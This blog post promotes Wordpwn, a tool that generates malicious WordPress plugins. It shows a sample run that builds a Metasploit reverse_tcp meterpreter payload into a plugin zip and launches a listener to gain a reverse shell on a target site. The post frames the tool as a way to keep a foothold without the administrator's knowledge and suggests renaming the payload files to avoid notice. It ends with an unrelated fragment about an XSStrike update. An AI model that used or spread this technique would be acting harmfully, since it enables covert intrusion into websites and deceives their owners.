I have covered about multiple tools that deal with WordPress vulnerability assessments and exploitation. A very good example of WordPress exploitation framework is the WPXF and the WordPress attack suite is aptly represented by WPForce & Yertle. This post is about Wordpwn, which can help you maintain your foothold after you have used a tool mentioned above without the knowledge of the administrator!
What is Wordpwn?
As the name suggests, Wordpwn is an open source malicious WordPress plugin generator coded in Python that utilizes the Metasploit framework to generate payloads. The script itself is pretty simple and has been tested working efficiently on Kali Linux. It completely automates the procedure of creating a malicious WordPress plugin and grants you a reverse shell once uploaded to the targeted system using the msfvenom php/meterpreter/reverse_tcp payload generator. Once this is done, Wordpwn also starts the local handler using msfconsole exploit/multi/handler. This is it’s sample working:
python wordpwn.py 127.0.0.1 8819 Y [*] Checking if msfvenom installed [+] msfvenom installed [+] Generating plugin script [+] Writing plugin script to file [+] Generating payload To file No platform was selected, choosing Msf::Module::Platform::PHP from the payload No Arch selected, selecting Arch: php from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of php/base64 php/base64 succeeded with size 1303 (iteration=0) php/base64 chosen with final size 1303 Payload size: 1303 bytes [+] Writing files to zip [+] Cleaning up files [+] General Execution Location: http://(target)/wp-content/plugins/malicous/ [+] General Upload Location: http://(target)/wp-admin/plugin-install.php?tab=upload [+] Launching handler [ ok ] Starting postgresql (via systemctl): postgresql.service.
All you now need to do is upload the malicious.zip that is created in the project directory. I would however change a few things from the .zip file as it has the same names for the PHP file – QwertyRocks.php is the plugin file and wetw0rk_maybe.php is the actual base64 encoded payload.
Other than the Metasploit framework, this script does not need an elaborate installation process. Check out the project hosted on Github and clone it to a location of your linking.
My initial post about this advanced XSS detection and exploitation suite was almost an year ago! Three days ago, an update – XSStrike 3.1.2 was released. This is a post that documents these changes. What is XSStrike? XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator,